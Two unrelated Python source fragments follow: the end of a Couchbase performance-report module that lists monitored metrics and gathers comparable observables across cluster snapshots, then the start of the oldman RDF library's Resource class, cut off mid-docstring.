"MainStore_bytes_incoming",
"MainStore_bytes_written",
"MainStore_write_amp",
"MainStore_lss_fragmentation",
"MainStore_cache_hits",
"MainStore_cache_misses",
"MainStore_cache_hit_ratio",
"MainStore_rcache_hits",
"MainStore_rcache_misses",
"MainStore_rcache_hit_ratio",
"MainStore_resident_ratio",
"MainStore_allocated",
"MainStore_freed",
"MainStore_reclaimed",
"MainStore_reclaim_pending",
"MainStore_mvcc_purge_ratio",
"MainStore_memory_quota",
"MainStore_lss_blk_read_bs",
"MainStore_lss_blk_gc_reads_bs",
"MainStore_lss_blk_rdr_reads_bs",
"MainStore_rlss_num_reads",
"MainStore_compressed_percent",
"MainStore_compressed_compressible_percent",
"MainStore_compress_cache_hit_ratio",
"MainStore_rcompress_cache_hit_ratio",
"MainStore_lss_cached_pages_percent",
"MainStore_num_burst_visits",
"MainStore_num_periodic_visits",
"MainStore_avg_throttle_dur_other",
"MainStore_avg_throttle_dur_reader",
"MainStore_avg_throttle_dur_writer",
"MainStore_inserts",
"MainStore_burst_eviction_rate",
"MainStore_periodic_eviction_rate",
"MainStore_eviction_rate_reader",
"MainStore_eviction_rate_writer",
"MainStore_eviction_rate_swapper",
"MainStore_eviction_rate_other",
"BackStore_memory_size",
"BackStore_num_cached_pages",
"BackStore_num_pages",
"BackStore_num_pages_swapout",
"BackStore_num_pages_swapin",
"BackStore_bytes_incoming",
"BackStore_bytes_written",
"BackStore_write_amp",
"BackStore_lss_fragmentation",
"BackStore_cache_hits",
"BackStore_cache_misses",
"BackStore_cache_hit_ratio",
"BackStore_rcache_hits",
"BackStore_rcache_misses",
"BackStore_rcache_hit_ratio",
"BackStore_resident_ratio",
"BackStore_allocated",
"BackStore_freed",
"BackStore_reclaimed",
"BackStore_reclaim_pending",
"BackStore_mvcc_purge_ratio",
"BackStore_lss_blk_read_bs",
"BackStore_lss_blk_gc_reads_bs",
"BackStore_lss_blk_rdr_reads_bs",
"BackStore_rlss_num_reads",
"BackStore_compressed_percent",
"BackStore_compressed_compressible_percent",
"BackStore_compress_cache_hit_ratio",
"BackStore_rcompress_cache_hit_ratio",
"BackStore_lss_cached_pages_percent",
"BackStore_num_burst_visits",
"BackStore_num_periodic_visits",
"BackStore_avg_throttle_dur_other",
"BackStore_avg_throttle_dur_reader",
"BackStore_avg_throttle_dur_writer",
"BackStore_inserts",
"BackStore_burst_eviction_rate",
"BackStore_periodic_eviction_rate",
"BackStore_eviction_rate_reader",
"BackStore_eviction_rate_writer",
"BackStore_eviction_rate_swapper",
"BackStore_eviction_rate_other",
]),
("secondary_storage_stats_mm", [
"mm_allocated",
"mm_resident",
"mm_metadata",
]),
("atop", [
"cbindex_cpu",
"cbindex_rss",
"cbindexperf_cpu",
"cbindexperf_rss",
"dcptest_rss",
"dcptest_cpu",
"cbbackupmgr_rss",
"cbbackupmgr_cpu",
"cbexport_rss",
"cbexport_cpu",
"cbimport_rss",
"cbimport_cpu",
"beam.smp_rss",
"beam.smp_cpu",
"memcached_rss",
"memcached_cpu",
"goxdcr_rss",
"goxdcr_cpu",
"indexer_rss",
"indexer_cpu",
"projector_rss",
"projector_cpu",
"cbq-engine_rss",
"cbq-engine_cpu",
"cbft_rss",
"cbft_cpu",
"eventing-produc_rss",
"eventing-produc_cpu",
"sync_gateway_cpu",
"sync_gateway_rss",
"sync_gateway_vsize",
"java_rss",
"java_cpu",
"cbc-pillowfight_rss",
"cbc-pillowfight_cpu",
"cblite_cpu",
"cblite_rss",
"cblite_vsize",
"prometheus_rss",
"prometheus_cpu",
]),
("sysdig", [
"indexer_pread",
"indexer_pwrite",
"memcached_pread",
"memcached_pwrite",
]),
("iostat", [
"tools_rbps",
"tools_wbps",
"tools_avgqusz",
"tools_util",
"data_rps",
"data_wps",
"data_rbps",
"data_wbps",
"data_avgqusz",
"data_util",
"index_rbps",
"index_wbps",
"index_avgqusz",
"index_util",
"analytics0_rbps",
"analytics0_wbps",
"analytics0_util",
"analytics1_rbps",
"analytics1_wbps",
"analytics1_util",
"analytics2_rbps",
"analytics2_wbps",
"analytics2_util",
"analytics3_rbps",
"analytics3_wbps",
"analytics3_util",
"analytics4_rbps",
"analytics4_wbps",
"analytics4_util",
]),
("disk", [
"data_bytes_read",
"data_bytes_written",
]),
("meminfo", [
"MemFree",
"Dirty",
"Buffers",
"Cached",
"SUnreclaim",
]),
("pcstat", [
"page_cache_hit_ratio",
"page_cache_total_hits",
"data_avg_page_cache_rr",
]),
("net", [
"in_bytes_per_sec",
"out_bytes_per_sec",
"ESTABLISHED",
"TIME_WAIT",
]),
("vmstat", [
"allocstall",
]),
("syncgateway_node_stats", [
"syncgateway__global__resource_utilization__process_cpu_percent_utilization",
"syncgateway__global__resource_utilization__process_memory_resident",
"syncgateway__global__resource_utilization__system_memory_total",
"syncgateway__global__resource_utilization__pub_net_bytes_sent",
"syncgateway__global__resource_utilization__pub_net_bytes_recv",
"syncgateway__global__resource_utilization__admin_net_bytes_sent",
"syncgateway__global__resource_utilization__admin_net_bytes_recv",
"syncgateway__global__resource_utilization__num_goroutines",
"syncgateway__global__resource_utilization__goroutines_high_watermark",
"syncgateway__global__resource_utilization__go_memstats_sys",
"syncgateway__global__resource_utilization__go_memstats_heapalloc",
"syncgateway__global__resource_utilization__go_memstats_heapidle",
"syncgateway__global__resource_utilization__go_memstats_heapinuse",
"syncgateway__global__resource_utilization__go_memstats_heapreleased",
"syncgateway__global__resource_utilization__go_memstats_stackinuse",
"syncgateway__global__resource_utilization__go_memstats_stacksys",
"syncgateway__global__resource_utilization__go_memstats_pausetotalns",
"syncgateway__global__resource_utilization__error_count",
"syncgateway__global__resource_utilization__warn_count",
"syncgateway__per_db__db__cache__rev_cache_hits",
"syncgateway__per_db__db__cache__rev_cache_misses",
"syncgateway__per_db__db__cache__rev_cache_bypass",
"syncgateway__per_db__db__cache__chan_cache_hits",
"syncgateway__per_db__db__cache__chan_cache_misses",
"syncgateway__per_db__db__cache__chan_cache_active_revs",
"syncgateway__per_db__db__cache__chan_cache_tombstone_revs",
"syncgateway__per_db__db__cache__chan_cache_removal_revs",
"syncgateway__per_db__db__cache__chan_cache_num_channels",
"syncgateway__per_db__db__cache__chan_cache_max_entries",
"syncgateway__per_db__db__cache__chan_cache_pending_queries",
"syncgateway__per_db__db__cache__chan_cache_channels_added",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_inactive",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_nru",
"syncgateway__per_db__db__cache__chan_cache_compact_count",
"syncgateway__per_db__db__cache__chan_cache_compact_time",
"syncgateway__per_db__db__cache__num_active_channels",
"syncgateway__per_db__db__cache__num_skipped_seqs",
"syncgateway__per_db__db__cache__abandoned_seqs",
"syncgateway__per_db__db__cache__high_seq_cached",
"syncgateway__per_db__db__cache__high_seq_stable",
"syncgateway__per_db__db__cache__skipped_seq_len",
"syncgateway__per_db__db__cache__pending_seq_len",
"syncgateway__per_db__db__database__sequence_get_count",
"syncgateway__per_db__db__database__sequence_incr_count",
"syncgateway__per_db__db__database__sequence_reserved_count",
"syncgateway__per_db__db__database__sequence_assigned_count",
"syncgateway__per_db__db__database__sequence_released_count",
"syncgateway__per_db__db__database__crc32c_match_count",
"syncgateway__per_db__db__database__num_replications_active",
"syncgateway__per_db__db__database__num_replications_total",
"syncgateway__per_db__db__database__num_doc_writes",
"syncgateway__per_db__db__database__num_tombstones_compacted",
"syncgateway__per_db__db__database__doc_writes_bytes",
"syncgateway__per_db__db__database__doc_writes_xattr_bytes",
"syncgateway__per_db__db__database__num_doc_reads_rest",
"syncgateway__per_db__db__database__num_doc_reads_blip",
"syncgateway__per_db__db__database__doc_writes_bytes_blip",
"syncgateway__per_db__db__database__doc_reads_bytes_blip",
"syncgateway__per_db__db__database__warn_xattr_size_count",
"syncgateway__per_db__db__database__warn_channels_per_doc_count",
"syncgateway__per_db__db__database__warn_grants_per_doc_count",
"syncgateway__per_db__db__database__dcp_received_count",
"syncgateway__per_db__db__database__high_seq_feed",
"syncgateway__per_db__db__database__dcp_received_time",
"syncgateway__per_db__db__database__dcp_caching_count",
"syncgateway__per_db__db__database__dcp_caching_time",
"syncgateway__per_db__db__delta_sync__deltas_requested",
"syncgateway__per_db__db__delta_sync__deltas_sent",
"syncgateway__per_db__db__delta_sync__delta_pull_replication_count",
"syncgateway__per_db__db__delta_sync__delta_cache_hit",
"syncgateway__per_db__db__delta_sync__delta_cache_miss",
"syncgateway__per_db__db__delta_sync__delta_push_doc_count",
"syncgateway__per_db__db__shared_bucket_import__import_count",
"syncgateway__per_db__db__shared_bucket_import__import_cancel_cas",
"syncgateway__per_db__db__shared_bucket_import__import_error_count",
"syncgateway__per_db__db__shared_bucket_import__import_processing_time",
"syncgateway__per_db__db__cbl_replication_push__doc_push_count",
"syncgateway__per_db__db__cbl_replication_push__write_processing_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_count",
"syncgateway__per_db__db__cbl_replication_push__propose_change_time",
"syncgateway__per_db__db__cbl_replication_push__propose_change_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_bytes",
"syncgateway__per_db__db__cbl_replication_push__conflict_write_count",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_since_zero",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_caught_up",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_count",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_time",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_count",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_latency",
"syncgateway__per_db__db__cbl_replication_pull__rev_processing_time",
"syncgateway__per_db__db__cbl_replication_pull__max_pending",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_count",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_bytes",
"syncgateway__per_db__db__security__num_docs_rejected",
"syncgateway__per_db__db__security__num_access_errors",
"syncgateway__per_db__db__security__auth_success_count",
"syncgateway__per_db__db__security__auth_failed_count",
"syncgateway__per_db__db__security__total_auth_time",
"syncGateway_import__import_count",
"syncgateway__per_db__db__gsi_views__access_count",
"syncgateway__per_db__db__gsi_views__roleAccess_count",
"syncgateway__per_db__db__gsi_views__channels_count",
]),
("syncgateway_cluster_stats", [
"syncgateway__global__resource_utilization__process_cpu_percent_utilization",
"syncgateway__global__resource_utilization__process_memory_resident",
"syncgateway__global__resource_utilization__system_memory_total",
"syncgateway__global__resource_utilization__pub_net_bytes_sent",
"syncgateway__global__resource_utilization__pub_net_bytes_recv",
"syncgateway__global__resource_utilization__admin_net_bytes_sent",
"syncgateway__global__resource_utilization__admin_net_bytes_recv",
"syncgateway__global__resource_utilization__num_goroutines",
"syncgateway__global__resource_utilization__goroutines_high_watermark",
"syncgateway__global__resource_utilization__go_memstats_sys",
"syncgateway__global__resource_utilization__go_memstats_heapalloc",
"syncgateway__global__resource_utilization__go_memstats_heapidle",
"syncgateway__global__resource_utilization__go_memstats_heapinuse",
"syncgateway__global__resource_utilization__go_memstats_heapreleased",
"syncgateway__global__resource_utilization__go_memstats_stackinuse",
"syncgateway__global__resource_utilization__go_memstats_stacksys",
"syncgateway__global__resource_utilization__go_memstats_pausetotalns",
"syncgateway__global__resource_utilization__error_count",
"syncgateway__global__resource_utilization__warn_count",
"syncgateway__per_db__db__cache__rev_cache_hits",
"syncgateway__per_db__db__cache__rev_cache_misses",
"syncgateway__per_db__db__cache__rev_cache_bypass",
"syncgateway__per_db__db__cache__chan_cache_hits",
"syncgateway__per_db__db__cache__chan_cache_misses",
"syncgateway__per_db__db__cache__chan_cache_active_revs",
"syncgateway__per_db__db__cache__chan_cache_tombstone_revs",
"syncgateway__per_db__db__cache__chan_cache_removal_revs",
"syncgateway__per_db__db__cache__chan_cache_num_channels",
"syncgateway__per_db__db__cache__chan_cache_max_entries",
"syncgateway__per_db__db__cache__chan_cache_pending_queries",
"syncgateway__per_db__db__cache__chan_cache_channels_added",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_inactive",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_nru",
"syncgateway__per_db__db__cache__chan_cache_compact_count",
"syncgateway__per_db__db__cache__chan_cache_compact_time",
"syncgateway__per_db__db__cache__num_active_channels",
"syncgateway__per_db__db__cache__num_skipped_seqs",
"syncgateway__per_db__db__cache__abandoned_seqs",
"syncgateway__per_db__db__cache__high_seq_cached",
"syncgateway__per_db__db__cache__high_seq_stable",
"syncgateway__per_db__db__cache__skipped_seq_len",
"syncgateway__per_db__db__cache__pending_seq_len",
"syncgateway__per_db__db__database__sequence_get_count",
"syncgateway__per_db__db__database__sequence_incr_count",
"syncgateway__per_db__db__database__sequence_reserved_count",
"syncgateway__per_db__db__database__sequence_assigned_count",
"syncgateway__per_db__db__database__sequence_released_count",
"syncgateway__per_db__db__database__crc32c_match_count",
"syncgateway__per_db__db__database__num_replications_active",
"syncgateway__per_db__db__database__num_replications_total",
"syncgateway__per_db__db__database__num_doc_writes",
"syncgateway__per_db__db__database__num_tombstones_compacted",
"syncgateway__per_db__db__database__doc_writes_bytes",
"syncgateway__per_db__db__database__doc_writes_xattr_bytes",
"syncgateway__per_db__db__database__num_doc_reads_rest",
"syncgateway__per_db__db__database__num_doc_reads_blip",
"syncgateway__per_db__db__database__doc_writes_bytes_blip",
"syncgateway__per_db__db__database__doc_reads_bytes_blip",
"syncgateway__per_db__db__database__warn_xattr_size_count",
"syncgateway__per_db__db__database__warn_channels_per_doc_count",
"syncgateway__per_db__db__database__warn_grants_per_doc_count",
"syncgateway__per_db__db__database__dcp_received_count",
"syncgateway__per_db__db__database__high_seq_feed",
"syncgateway__per_db__db__database__dcp_received_time",
"syncgateway__per_db__db__database__dcp_caching_count",
"syncgateway__per_db__db__database__dcp_caching_time",
"syncgateway__per_db__db__delta_sync__deltas_requested",
"syncgateway__per_db__db__delta_sync__deltas_sent",
"syncgateway__per_db__db__delta_sync__delta_pull_replication_count",
"syncgateway__per_db__db__delta_sync__delta_cache_hit",
"syncgateway__per_db__db__delta_sync__delta_cache_miss",
"syncgateway__per_db__db__delta_sync__delta_push_doc_count",
"syncgateway__per_db__db__shared_bucket_import__import_count",
"syncgateway__per_db__db__shared_bucket_import__import_cancel_cas",
"syncgateway__per_db__db__shared_bucket_import__import_error_count",
"syncgateway__per_db__db__shared_bucket_import__import_processing_time",
"syncgateway__per_db__db__cbl_replication_push__doc_push_count",
"syncgateway__per_db__db__cbl_replication_push__write_processing_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_count",
"syncgateway__per_db__db__cbl_replication_push__propose_change_time",
"syncgateway__per_db__db__cbl_replication_push__propose_change_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_bytes",
"syncgateway__per_db__db__cbl_replication_push__conflict_write_count",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_since_zero",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_caught_up",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_count",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_time",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_count",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_latency",
"syncgateway__per_db__db__cbl_replication_pull__rev_processing_time",
"syncgateway__per_db__db__cbl_replication_pull__max_pending",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_count",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_bytes",
"syncgateway__per_db__db__security__num_docs_rejected",
"syncgateway__per_db__db__security__num_access_errors",
"syncgateway__per_db__db__security__auth_success_count",
"syncgateway__per_db__db__security__auth_failed_count",
"syncgateway__per_db__db__security__total_auth_time",
"syncGateway_import__import_count",
"syncgateway__per_db__db__gsi_views__access_count",
"syncgateway__per_db__db__gsi_views__roleAccess_count",
"syncgateway__per_db__db__gsi_views__channels_count",
]),
))
def __init__(self, snapshots):
"""As part of initialization prefetch list of buckets and servers in
order to reduce number of SQL queries. Also store list of snapshots.
"""
self.snapshots = snapshots
self.buckets = ()
self.servers = ()
self.indexes = ()
for snapshot in snapshots:
buckets = {
b.name for b in models.Bucket.objects.filter(cluster=snapshot.cluster)
}
if self.buckets == ():
self.buckets = buckets
else:
self.buckets = buckets & self.buckets
indexes = {
i.name for i in models.Index.objects.filter(cluster=snapshot.cluster)
}
if self.indexes == ():
self.indexes = indexes
else:
self.indexes = indexes & self.indexes
servers = {
s.address for s in models.Server.objects.filter(cluster=snapshot.cluster)
}
if self.servers == ():
self.servers = servers
else:
self.servers = servers & self.servers
def get_observables(self):
"""Get all stored in database Observable objects that match provided
snapshots. There are three expensive queries per snapshot:
-- get all cluster-wide metrics
-- get all per-bucket metrics
-- get all per-index metrics
-- get all per-server metrics
That was the only obvious way to achieve O(n) time complexity.
all_observables is the nested dictionary where every object is may be
queried as:
all_observables[bucket/server/index][cluster][name][collector]
It's allowed to use "" for bucket names and server addresses.
Every model object is converted to extended named tuple.
"""
all_observables = defaultdict(dict)
all_observables[""] = defaultdict(dict)
for snapshot in self.snapshots:
# Cluster-wide metrics
observables = defaultdict(dict)
for o in models.Observable.objects.filter(cluster=snapshot.cluster,
bucket__isnull=True,
server__isnull=True,
index__isnull=True):
observables[o.collector][o.name] = Observable(
snapshot.cluster.name, "", "", "", o.name, o.collector
)
all_observables[""][""][snapshot.cluster] = observables
# Per-bucket metrics
for bucket in self.buckets:
_bucket = models.Bucket.objects.get(cluster=snapshot.cluster,
name=bucket)
observables = defaultdict(dict)
for o in models.Observable.objects.filter(cluster=snapshot.cluster,
bucket=_bucket,
server__isnull=True,
index__isnull=True):
observables[o.collector][o.name] = Observable(
snapshot.cluster.name, "", bucket, "", o.name, o.collector
)
all_observables[""][bucket][snapshot.cluster] = observables
# Per-index metrics
for index in self.indexes:
_index = models.Index.objects.get(cluster=snapshot.cluster,
name=index)
observables = defaultdict(dict)
for o in models.Observable.objects.filter(cluster=snapshot.cluster,
bucket__isnull=True,
server__isnull=True,
index=_index):
observables[o.collector][o.name] = Observable(
snapshot.cluster.name, "", "", index, o.name, o.collector
)
all_observables[""][index][snapshot.cluster] = observables
# Per-server metrics
for server in self.servers:
_server = models.Server.objects.get(cluster=snapshot.cluster,
address=server)
observables = defaultdict(dict)
for o in models.Observable.objects.filter(cluster=snapshot.cluster,
bucket__isnull=True,
server=_server,
index__isnull=True):
observables[o.collector][o.name] = Observable(
snapshot.cluster.name, server, "", "", o.name, o.collector
)
all_observables[""][server][snapshot.cluster] = observables
# Per-server Per-Bucket metrics
for server in self.servers:
if server not in all_observables:
all_observables[server] = defaultdict(dict)
for bucket in self.buckets:
_server = models.Server.objects.get(cluster=snapshot.cluster,
address=server)
_bucket = models.Bucket.objects.get(cluster=snapshot.cluster,
name=bucket)
observables = defaultdict(dict)
for o in models.Observable.objects.filter(cluster=snapshot.cluster,
bucket=_bucket,
server=_server,
index__isnull=True):
observables[o.collector][o.name] = Observable(
snapshot.cluster.name, server, bucket, "", o.name, o.collector
)
all_observables[server][bucket][snapshot.cluster] = observables
return all_observables
def get_report(self):
"""Primary class method that return tuple with valid Observable objects
"""
all_observables = self.get_observables()
observables = []
for collector, metrics in self.METRICS.iteritems():
# Cluster-wide metrics
if collector in ("active_tasks",
"ns_server",
"n1ql_stats",
"fts_totals",
"fts_latency",
"secondary_debugstats",
"secondaryscan_latency",
"secondary_storage_stats_mm",
"syncgateway_cluster_stats",
"sgimport_latency",
):
for metric in metrics:
observables.append([
all_observables[""][""][snapshot.cluster][collector].get(metric)
for snapshot in self.snapshots
])
# Per-server metrics
if collector in ("atop",
"analytics",
"disk",
"iostat",
"net",
"fts_stats",
"meminfo",
"pcstat",
"sysdig",
"ns_server_system",
"syncgateway_node_stats",
"eventing_per_node_stats",
"sgimport_latency",
"vmstat",
):
for metric in metrics:
for server in self.servers:
observables.append([
all_observables[""][server][snapshot.cluster][collector].get(metric)
for snapshot in self.snapshots
])
# Per-bucket metrics
if collector in ("active_tasks",
"xdcr_stats",
"ns_server",
"spring_latency",
"spring_query_latency",
"durability",
"observe",
"xdcr_lag",
"secondary_stats",
"secondary_debugstats_bucket",
"eventing_stats",
"jts_stats",
"sgimport_latency",
"kvstore_stats",
"eventing_per_handler_stats",
"cbstats_memory",
"cbstats_all",
):
for metric in metrics:
for bucket in self.buckets:
observables.append([
all_observables[""][bucket][snapshot.cluster][collector].get(metric)
for snapshot in self.snapshots
])
# Per-index metrics
if collector in ("secondary_debugstats_index",
"secondary_storage_stats",
):
for metric in metrics:
for index in self.indexes:
observables.append([
all_observables[""][index][snapshot.cluster][collector].get(metric)
for snapshot in self.snapshots
])
# Per-server, Per-bucket metrics
if collector in ("eventing_consumer_stats",
):
for metric in metrics:
for server in self.servers:
for bucket in self.buckets:
if bucket in all_observables[server]:
observables.append([
all_observables[server][bucket][snapshot.cluster][collector].get(metric)
for snapshot in self.snapshots
if snapshot.cluster in all_observables[server][bucket]
])
# Skip full mismatch and return tuple with Observable objects
return tuple(_ for _ in observables if set(_) != {None})
|
|
from functools import partial
from urlparse import urlparse
import logging
import json
from types import GeneratorType
from rdflib import URIRef, Graph, RDF
from oldman.exception import OMUnauthorizedTypeChangeError, OMInternalError, OMUserError
from oldman.exception import OMAttributeAccessError, OMUniquenessError, OMWrongResourceError, OMEditError
from oldman.common import OBJECT_PROPERTY
class Resource(object):
"""A :class:`~oldman.resource.resource.Resource` object is a subject-centric representation of a Web resource.
A set of :class:`~oldman.resource.resource.Resource` objects is equivalent to a RDF graph.
In RDF, a resource is identified by an IRI (globally) or a blank node (locally).
Because blank node support is complex and limited (:class:`rdflib.plugins.stores.sparqlstore.SPARQLStore`
stores do not support them), **every** :class:`~oldman.resource.Resource` **object has an IRI**.
This IRI is either given or generated by a :class:`~oldman.iri.IriGenerator` object.
Some generators generate recognizable `skolem IRIs
<http://www.w3.org/TR/2014/REC-rdf11-concepts-20140225/#section-skolemization>`_
that are treated as blank nodes when the resource is serialized into JSON, JSON-LD
or another RDF format (for external consumption).
A resource is usually instance of some RDFS classes. These classes are grouped in its attribute `types`.
:class:`~oldman.model.Model` objects are found from these classes, by calling the method
:func:`oldman.resource.manager.ResourceManager.find_models_and_types`.
Models give access to Python methods and to :class:`~oldman.attribute.OMAttribute` objects.
Their ordering determines inheritance priorities.
The main model is the first one of this list.
Values of :class:`~oldman.attribute.OMAttribute` objects are accessible and modifiable
like ordinary Python attribute values.
However, these values are checked so some :class:`~oldman.exception.OMAccessError`
or :class:`~oldman.exception.OMEditError` errors may be raised.
This abstract class accepts two concrete classes: :class:`~oldman.resource.resource.StoreResource` and
:class:`~oldman.resource.resource.ClientResource`. The former is serializable and can be saved directly
by the datastore while the latter has to be converted into a :class:`~oldman.resource.resource.StoreResource`
so as to be saved.
Example::
>>> alice = StoreResource(model_manager, data_store, types=["http://schema.org/Person"], name=u"Alice")
>>> alice.id
u'http://localhost/persons/1'
>>> alice.name
u'Alice'
>>> alice.save()
>>> alice.name = "Alice A."
>>> print alice.to_jsonld()
{
"@context": "http://localhost/person.jsonld",
"id": "http://localhost/persons/1",
"types": [
"http://schema.org/Person"
],
"name": "Alice A."
}
>>> alice.name = 5
oldman.exception.OMAttributeTypeCheckError: 5 is not a (<type 'str'>, <type 'unicode'>)
.. admonition:: Resource creation
:class:`~oldman.resource.resource.Resource` objects are normally created by a
:class:`~oldman.model.model.Model` or a
:class:`~oldman.resource.manager.ResourceManager` object. Please use the
methods :func:`oldman.model.model.Model.create`, :func:`oldman.model.Model.new`,
:func:`oldman.resource.manager.ResourceManager.create` or
:func:`oldman.resource.manager.ResourceManager.new` for creating new
:class:`~oldman.resource.Resource` objects.
:param model_manager: :class:`~oldman.model.manager.ModelManager` object. Gives access to its models.
:param data_store: :class:`~oldman.store.datastore.DataStore` object. Datastore that has authority
on this resource.
:param id: IRI of the resource. If not given, this IRI is generated by the main model. Defaults to `None`.
:param types: IRI list or set of the RDFS classes the resource is instance of. Defaults to `set()`.
:param hashless_iri: Hash-less IRI that is given to the main model for generating a new IRI if no `id` is given.
The IRI generator may ignore it. Defaults to `None`. Must be `None` if `collection_iri` is given.
:param collection_iri: IRI of the controller to which this resource belongs. This information
is used to generate a new IRI if no `id` is given. The IRI generator may ignore it.
Defaults to `None`. Must be `None` if `hashless_iri` is given.
:param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
`data_store`. Defaults to `True`.
:param former_types: IRI list or set of the RDFS classes the resource was instance of. Defaults to `set()`.
:param kwargs: values indexed by their attribute names.
"""
_special_attribute_names = ["_models", "_id", "_types", "_is_blank_node", "_model_manager",
"_store", "_former_types", "_logger", "_resource_manager", "_is_new"]
_pickle_attribute_names = ["_id", '_types', '_is_new']
def __init__(self, model_manager, data_store, id=None, types=None, hashless_iri=None, collection_iri=None,
is_new=True, former_types=None, **kwargs):
"""Inits but does not save it (in the `data_graph`)."""
self._models, self._types = model_manager.find_models_and_types(types)
if former_types is not None:
self._former_types = set(former_types)
else:
self._former_types = set(self._types) if not is_new else set()
main_model = self._models[0]
self._model_manager = model_manager
self._store = data_store
self._is_new = is_new
if hashless_iri is not None and collection_iri is not None:
raise OMUserError(u"Hashless_iri (%s) and collection_iri (%s) cannot be given in the same time."
% (hashless_iri, collection_iri))
if id is not None:
# Anticipated because used in __hash__
self._id = id
if is_new and self._store.exists(id):
raise OMUniquenessError("Object %s already exist" % self._id)
else:
self._id = main_model.generate_iri(hashless_iri=hashless_iri,
collection_iri=collection_iri)
self._init_non_persistent_attributes(self._id)
for k, v in kwargs.iteritems():
if k in self._special_attribute_names:
raise AttributeError(u"Special attribute %s should not appear in **kwargs" % k)
setattr(self, k, v)
def _init_non_persistent_attributes(self, id):
"""Used at init and unpickling times."""
self._logger = logging.getLogger(__name__)
self._is_blank_node = is_blank_node(id)
@property
def types(self):
"""IRI list of the RDFS classes the resource is instance of."""
return list(self._types)
@property
def models(self):
"""TODO: describe"""
return list(self._models)
@property
def id(self):
"""IRI that identifies the resource."""
return self._id
@property
def hashless_iri(self):
"""Hash-less IRI of the `id` attribute.
Is obtained by removing the fragment from the IRI.
"""
return self._id.split('#')[0]
@property
def context(self):
""" An IRI, a `list` or a `dict` that describes the JSON-LD context.
Derived from :attr:`oldman.model.Model.context` attributes.
"""
if len(self._models) > 1:
raise NotImplementedError(u"TODO: merge contexts when a Resource has multiple models")
return list(self._models)[0].context
@property
def local_context(self):
"""Context that is locally accessible but that may not be advertised in the JSON-LD serialization."""
if len(self._models) > 1:
raise NotImplementedError(u"TODO: merge local contexts when a Resource has multiple models")
return list(self._models)[0].local_context
@property
def model_manager(self):
""":class:`~oldman.model.manager.ModelManager` object. Gives access to the
:class:`~oldman.model.model.Model` objects. """
return self._model_manager
@property
def store(self):
""":class:`~oldman.store.datastore.DataStore` object."""
return self._store
@property
def is_new(self):
"""True if the resource has never been saved."""
return self._is_new
@property
def former_types(self):
"""Not for end-users"""
return list(self._former_types)
@property
def non_model_types(self):
"""RDFS classes that are not associated to a `Model`."""
return set(self._types).difference({m.class_iri for m in self._models})
@property
def former_non_model_types(self):
"""RDFS classes that were not associated to a `Model`."""
if len(self._former_types) == 0:
return {}
possible_non_model_types = set(self._former_types).difference({m.class_iri
for m in self._models})
if len(possible_non_model_types) == 0:
return {}
corresponding_models, _ = self._model_manager.find_models_and_types(possible_non_model_types)
return possible_non_model_types.difference({m.class_iri for m in corresponding_models})
def is_valid(self):
"""Tests if the resource is valid.
:return: `False` if the resource is invalid, `True` otherwise.
"""
for model in self._models:
for attr in model.om_attributes.values():
if not attr.is_valid(self):
return False
return True
def is_blank_node(self):
"""Tests if `id` is a skolem IRI and should thus be considered as a blank node.
See :func:`~oldman.resource.is_blank_node` for further details.
:return: `True` if `id` is a locally skolemized IRI.
"""
return self._is_blank_node
def is_instance_of(self, model):
""" Tests if the resource is instance of the RDFS class of the model.
:param model: :class:`~oldman.model.Model` object.
:return: `True` if the resource is instance of the RDFS class.
"""
return model.class_iri in self._types
def in_same_document(self, other_resource):
"""Tests if two resources have the same hash-less IRI.
:return: `True` if these resources are in the same document.
"""
return self.hashless_iri == other_resource.hashless_iri
def get_operation(self, http_method):
"""TODO: describe """
for model in self._models:
operation = model.get_operation(http_method)
if operation is not None:
return operation
return None
def get_lightly(self, attribute_name):
"""If the attribute corresponds to an `owl:ObjectProperty`, returns a IRI or None.
Otherwise (if is a datatype), returns the value.
"""
return self.get_attribute(attribute_name).get_lightly(self)
def get_attribute(self, attribute_name):
"""Not for the end-user!"""
for model in self._models:
if attribute_name in model.om_attributes:
return model.access_attribute(attribute_name)
raise AttributeError("%s has no regular attribute %s" % (self, attribute_name))
def __getattr__(self, name):
"""Gets:
* A declared Python method ;
* A declared operation ;
* Or the value of a given :class:`~oldman.attribute.OMAttribute` object.
Note that attributes stored in the `__dict__` attribute are not concerned
by this method.
:class:`~oldman.attribute.OMAttribute` objects are made accessible
by :class:`~oldman.model.Model` objects.
